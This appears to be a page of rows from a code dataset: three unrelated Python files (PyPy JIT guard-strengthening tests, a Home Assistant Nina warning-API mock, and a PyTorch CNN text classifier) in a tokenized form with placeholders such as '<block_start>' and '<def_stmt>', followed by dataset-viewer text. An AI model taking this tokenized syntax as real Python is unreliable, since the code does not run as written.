<return>abs(val)<eq>1<block_end><block_end><class_stmt>FakeOp(object)<block_start><def_stmt>__init__ self cmpop<block_start>self.boolinverse=ResOperation(cmpop [box(0) box(0)] <none>).boolinverse<line_sep>self.cmpop=cmpop<block_end><def_stmt>getopnum self<block_start><return>self.cmpop<block_end><def_stmt>getarg self index<block_start><if_stmt>index<eq>0<block_start><return>'lhs'<block_end><elif_stmt>index<eq>1<block_start><return>'rhs'<block_end><else_stmt><block_start><assert_stmt>0<block_end><block_end><block_end><class_stmt>FakeResOp(object)<block_start><def_stmt>__init__ self opnum<block_start>self.opnum=opnum<block_end><def_stmt>getopnum self<block_start><return>self.opnum<block_end><block_end><def_stmt>box value<block_start><return>InputArgInt(value)<block_end><def_stmt>const value<block_start><return>Const._new(value)<block_end><def_stmt>iv value coeff=(1 1 0)<block_start>var=IndexVar(value)<line_sep>var.coefficient_mul=coeff[0]<line_sep>var.coefficient_div=coeff[1]<line_sep>var.constant=coeff[2]<line_sep><return>var<block_end><def_stmt>guard opnum<block_start><def_stmt>guard_impl cmpop lhs rhs<block_start>guard=Guard(0 FakeResOp(opnum) FakeOp(cmpop) {'lhs':lhs 'rhs':rhs})<line_sep><return>guard<block_end><return>guard_impl<block_end>guard_true=guard(rop.GUARD_TRUE)<line_sep>guard_false=guard(rop.GUARD_FALSE)<del_stmt>guard<class_stmt>TestGuard(SchedulerBaseTest)<block_start><def_stmt>optguards self loop user_code=<false><block_start>info=FakeLoopInfo(loop)<line_sep>info.snapshot(loop)<for_stmt>op loop.operations<block_start><if_stmt>op.is_guard()<block_start>op.setdescr(compile.CompileLoopVersionDescr())<block_end><block_end>dep=DependencyGraph(loop)<line_sep>opt=GuardStrengthenOpt(dep.index_vars)<line_sep>opt.propagate_all_forward(info loop user_code)<line_sep><return>opt<block_end><def_stmt>assert_guard_count self loop count<block_start>guard=0<for_stmt>op loop.operations+loop.prefix<block_start><if_stmt>op.is_guard()<block_start>guard<augadd>1<block_end><block_end><if_stmt>guard<ne>count<block_start>self.debug_print_operations(loop)<block_end><assert_stmt>guard<eq>count<block_end><def_stmt>assert_contains_sequence self loop instr<block_start><class_stmt>Glob(object)<block_start>next=<none><line_sep>prev=<none><def_stmt>__repr__ self<block_start><return>'*'<block_end><block_end><import_from_stmt>rpython.jit.tool.oparser OpParser default_fail_descr<line_sep>parser=OpParser(instr self.cpu self.namespace <none> default_fail_descr <true> <none>)<line_sep>parser.vars={arg.repr_short(arg._repr_memo):arg<for>arg loop.inputargs}<line_sep>operations=[]<line_sep>last_glob=<none><line_sep>prev_op=<none><for_stmt>line instr.splitlines()<block_start>line=line.strip()<if_stmt>line.startswith("#")<or>line<eq>""<block_start><continue><block_end><if_stmt>line.startswith("...")<block_start>last_glob=Glob()<line_sep>last_glob.prev=prev_op<line_sep>operations.append(last_glob)<line_sep><continue><block_end>op=parser.parse_next_op(line)<if_stmt>last_glob<is><not><none><block_start>last_glob.next=op<line_sep>last_glob=<none><block_end>operations.append(op)<block_end><def_stmt>check op candidate rename<block_start>m=0<if_stmt>isinstance(candidate Glob)<block_start><if_stmt>candidate.next<is><none><block_start><return>0# consumes the rest
<block_end><if_stmt>op.getopnum()<ne>candidate.next.getopnum()<block_start><return>0<block_end>m=1<line_sep>candidate=candidate.next<block_end><if_stmt>op.getopnum()<eq>candidate.getopnum()<block_start><for_stmt>i,arg enumerate(op.getarglist())<block_start>oarg=candidate.getarg(i)<if_stmt>arg<in>rename<block_start><assert_stmt>rename[arg].same_box(oarg)<block_end><else_stmt><block_start>rename[arg]=oarg<block_end><block_end><if_stmt><not>op.returns_void()<block_start>rename[op]=candidate<block_end>m<augadd>1<line_sep><return>m<block_end><return>0<block_end>j=0<line_sep>rename={}<line_sep>ops=loop.finaloplist()<for_stmt>i,op enumerate(ops)<block_start>candidate=operations[j]<line_sep>j<augadd>check(op candidate rename)<block_end><if_stmt>isinstance(operations[-1] Glob)<block_start><assert_stmt>j<eq>len(operations)-1 self.debug_print_operations(loop)<block_end><else_stmt><block_start><assert_stmt>j<eq>len(operations) self.debug_print_operations(loop)<block_end><block_end><def_stmt>test_basic self<block_start>loop1=self.parse_trace("""
i10 = int_lt(i1, 42)
guard_true(i10) []
i101 = int_add(i1, 1)
i102 = int_lt(i101, 42)
guard_true(i102) []
""")<line_sep>opt=self.optguards(loop1)<line_sep>self.assert_guard_count(loop1 1)<line_sep>self.assert_contains_sequence(loop1 """
...
i101 = int_add(i1, 1)
i12 = int_lt(i101, 42)
guard_true(i12) []
...
""")<block_end><def_stmt>test_basic_sub self<block_start>loop1=self.parse_trace("""
i10 = int_gt(i1, 42)
guard_true(i10) []
i101 = int_sub(i1, 1)
i12 = int_gt(i101, 42)
guard_true(i12) []
""")<line_sep>opt=self.optguards(loop1)<line_sep>self.assert_guard_count(loop1 1)<line_sep>self.assert_contains_sequence(loop1 """
...
i101 = int_sub(i1, 1)
i12 = int_gt(i101, 42)
guard_true(i12) []
...
""")<block_end><def_stmt>test_basic_mul self<block_start>loop1=self.parse_trace("""
i10 = int_mul(i1, 4)
i20 = int_lt(i10, 42)
guard_true(i20) []
i12 = int_add(i10, 1)
i13 = int_lt(i12, 42)
guard_true(i13) []
""")<line_sep>opt=self.optguards(loop1)<line_sep>self.assert_guard_count(loop1 1)<line_sep>self.assert_contains_sequence(loop1 """
...
i101 = int_mul(i1, 4)
i12 = int_add(i101, 1)
i13 = int_lt(i12, 42)
guard_true(i13) []
...
""")<block_end><def_stmt>test_compare self<block_start>key=box(1)<line_sep>incomparable=(<false> 0)<line_sep># const const
<assert_stmt>iv(const(42)).compare(iv(const(42)))<eq>(<true> 0)<assert_stmt>iv(const(-400)).compare(iv(const(-200)))<eq>(<true> -200)<assert_stmt>iv(const(0)).compare(iv(const(-1)))<eq>(<true> 1)<line_sep># var const
<assert_stmt>iv(key coeff=(1 1 0)).compare(iv(const(42)))<eq>incomparable<assert_stmt>iv(key coeff=(5 70 500)).compare(iv(const(500)))<eq>incomparable<line_sep># var var
<assert_stmt>iv(key coeff=(1 1 0)).compare(iv(key coeff=(1 1 0)))<eq>(<true> 0)<assert_stmt>iv(key coeff=(1 7 0)).compare(iv(key coeff=(1 7 0)))<eq>(<true> 0)<assert_stmt>iv(key coeff=(4 7 0)).compare(iv(key coeff=(3 7 0)))<eq>incomparable<assert_stmt>iv(key coeff=(14 7 0)).compare(iv(key coeff=(2 1 0)))<eq>(<true> 0)<assert_stmt>iv(key coeff=(14 7 33)).compare(iv(key coeff=(2 1 0)))<eq>(<true> 33)<assert_stmt>iv(key coeff=(15 5 33)).compare(iv(key coeff=(3 1 33)))<eq>(<true> 0)<block_end><def_stmt>test_imply_basic self<block_start>key=box(1)<line_sep># if x < 42 <=> x < 42
g1=guard_true(rop.INT_LT iv(key coeff=(1 1 0)) iv(const(42)))<line_sep>g2=guard_true(rop.INT_LT iv(key coeff=(1 1 0)) iv(const(42)))<assert_stmt>g1.implies(g2)<assert_stmt>g2.implies(g1)<line_sep># if x+1 < 42 => x < 42
g1=guard_true(rop.INT_LT iv(key coeff=(1 1 1)) iv(const(42)))<line_sep>g2=guard_true(rop.INT_LT iv(key coeff=(1 1 0)) iv(const(42)))<assert_stmt>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># if x+2 < 42 => x < 39
# counter: 39+2 < 42 => 39 < 39
g1=guard_true(rop.INT_LT iv(key coeff=(1 1 2)) iv(const(42)))<line_sep>g2=guard_true(rop.INT_LT iv(key coeff=(1 1 0)) iv(const(39)))<assert_stmt><not>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># if x+2 <= 42 => x <= 43
g1=guard_true(rop.INT_LE iv(key coeff=(1 1 2)) iv(const(42)))<line_sep>g2=guard_true(rop.INT_LE iv(key coeff=(1 1 0)) iv(const(43)))<assert_stmt>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># if x*13/3+1 <= 0 => x*13/3 <= -1
# is true, but the implies method is not smart enough
g1=guard_true(rop.INT_LE iv(key coeff=(13 3 1)) iv(const(0)))<line_sep>g2=guard_true(rop.INT_LE iv(key coeff=(13 3 0)) iv(const(-1)))<assert_stmt><not>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># > or >=
# if x > -55 => x*2 > -44
# counter: -44 > -55 (True) => -88 > -44 (False)
g1=guard_true(rop.INT_GT iv(key coeff=(1 1 0)) iv(const(-55)))<line_sep>g2=guard_true(rop.INT_GT iv(key coeff=(2 1 0)) iv(const(-44)))<assert_stmt><not>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># if x*2/2 > -44 => x*2/2 > -55
g1=guard_true(rop.INT_GE iv(key coeff=(2 2 0)) iv(const(-44)))<line_sep>g2=guard_true(rop.INT_GE iv(key coeff=(2 2 0)) iv(const(-55)))<assert_stmt>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<block_end><def_stmt>test_imply_coeff self<block_start>key=box(1)<line_sep>key2=box(2)<line_sep># if x > y * 9/3 => x > y
# counter: x = -2, y = -1, -2 > -3 => -2 > -1, True => False
g1=guard_true(rop.INT_GT iv(key coeff=(1 1 0)) iv(box(1) coeff=(9 3 0)))<line_sep>g2=guard_true(rop.INT_GT iv(key coeff=(1 1 0)) iv(box(1) coeff=(1 1 0)))<assert_stmt><not>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># if x > y * 15/5 <=> x > y * 3
g1=guard_true(rop.INT_GT iv(key coeff=(1 1 0)) iv(key2 coeff=(15 5 0)))<line_sep>g2=guard_true(rop.INT_GT iv(key coeff=(1 1 0)) iv(key2 coeff=(3 1 0)))<assert_stmt>g1.implies(g2)<assert_stmt>g2.implies(g1)<line_sep># x >= y => x*3-5 >= y
# counter: 1 >= 0 => 1*3-5 >= 0 == -2 >= 0, True => False
g1=guard_true(rop.INT_GE iv(key coeff=(1 1 0)) iv(key2))<line_sep>g2=guard_true(rop.INT_GE iv(key coeff=(3 1 -5)) iv(key2))<assert_stmt><not>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># guard false inverst >= to <
# x < y => x*3-5 < y
# counter: 3 < 4 => 3*3-5 < 4 == 4 < 4, True => False
g1=guard_false(rop.INT_GE iv(key coeff=(1 1 0)) iv(key2))<line_sep>g2=guard_false(rop.INT_GE iv(key coeff=(3 1 -5)) iv(key2))<assert_stmt><not>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># x <= y => x*3-5 > y
# counter: 3 < 4 => 3*3-5 < 4 == 4 < 4, True => False
g1=guard_false(rop.INT_GT iv(key coeff=(1 1 0)) iv(key2))<line_sep>g2=guard_true(rop.INT_GT iv(key coeff=(3 1 -5)) iv(key2))<assert_stmt><not>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<block_end><def_stmt>test_collapse self<block_start>loop1=self.parse_trace("""
i10 = int_gt(i1, 42)
guard_true(i10) []
i11 = int_add(i1, 1)
i12 = int_gt(i11, i2)
guard_true(i12) []
""")<line_sep>opt=self.optguards(loop1 <true>)<line_sep>self.assert_guard_count(loop1 2)<line_sep>self.assert_contains_sequence(loop1 """
...
i100 = int_ge(42, i2)
guard_true(i100) []
...
i40 = int_gt(i1, 42)
guard_true(i40) []
...
""")<block_end><block_end>
|
"""Tests for the Nina integration."""<import_stmt>json<import_from_stmt>typing Any<import_from_stmt>tests.common load_fixture<def_stmt>mocked_request_function url:str<arrow>dict[str Any]<block_start>"""Mock of the request function."""<line_sep>dummy_response:dict[str Any]=json.loads(load_fixture("sample_warnings.json" "nina"))<line_sep>dummy_response_details:dict[str Any]=json.loads(load_fixture("sample_warning_details.json" "nina"))<if_stmt>url<eq>"https://warnung.bund.de/api31/dashboard/083350000000.json"<block_start><return>dummy_response<block_end>warning_id=url.replace("https://warnung.bund.de/api31/warnings/" "").replace(".json" "")<line_sep><return>dummy_response_details[warning_id]<block_end>
|
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<class_stmt>CNN_Text(nn.Module)<block_start><def_stmt>__init__ self args<block_start>super(CNN_Text self).__init__()<line_sep>self.args=args<line_sep>embed_num=args.embed_num<line_sep>embed_dim=args.embed_dim<line_sep>class_num=args.class_num<line_sep>Ci=1<line_sep>kernel_num=args.kernel_num<line_sep>kernel_sizes=args.kernel_sizes<line_sep>self.embed=nn.Embedding(embed_num embed_dim)<line_sep>self.convs_list=nn.ModuleList([nn.Conv2d(Ci kernel_num (kernel_size embed_dim))<for>kernel_size kernel_sizes])<line_sep>self.dropout=nn.Dropout(args.dropout)<line_sep>self.fc=nn.Linear(len(kernel_sizes)<times>kernel_num class_num)<block_end><def_stmt>forward self x<block_start>x=self.embed(x)<line_sep>x=x.unsqueeze(1)<line_sep>x=[F.relu(conv(x)).squeeze(3)<for>conv self.convs_list]<line_sep>x=[F.max_pool1d(i i.size(2)).squeeze(2)<for>i x]<line_sep>x=torch.cat(x 1)<line_sep>x=self.dropout(x)<line_sep>x=x.view(x.size(0) -1)<line_sep>logit=self.fc(x)<line_sep><return>logit<block_end><block_end>
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.